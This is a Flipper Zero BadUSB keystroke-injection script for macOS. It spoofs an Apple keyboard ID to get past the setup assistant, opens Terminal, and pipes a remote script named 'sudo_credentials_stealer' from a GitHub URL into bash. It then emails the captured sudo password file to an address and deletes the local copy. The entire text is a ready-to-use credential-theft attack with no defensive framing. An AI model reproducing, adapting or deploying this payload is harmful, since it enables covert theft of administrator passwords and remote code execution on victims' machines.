ID 05ac:021e Apple:Keyboard REM Keep these 3 lines IF (and only if) it's the first time you are performing a badKB attack against a specific macOS target. REM In fact, it helps Flipper Zero bypass the macOS keyboard setup assistant. Otherwise the attack will not start. REM Author: 47LeCoste REM Version 1.0 (Flipper Ducky) REM Target: macOS DELAY 3000 F4 DELAY 1000 STRING Terminal DELAY 200 ENTER DELAY 1000 STRING curl -fsSL https://raw.githubusercontent.com/grugnoymeme/flipperzero-badUSB/main/macOS/sudo_credentials_stealer/script.sh | bash ENTER DELAY 5000 STRING mail -s "SUDO Credentials" example@example.com < pass.txt && rm pass.txt & DELAY 5000 GUI q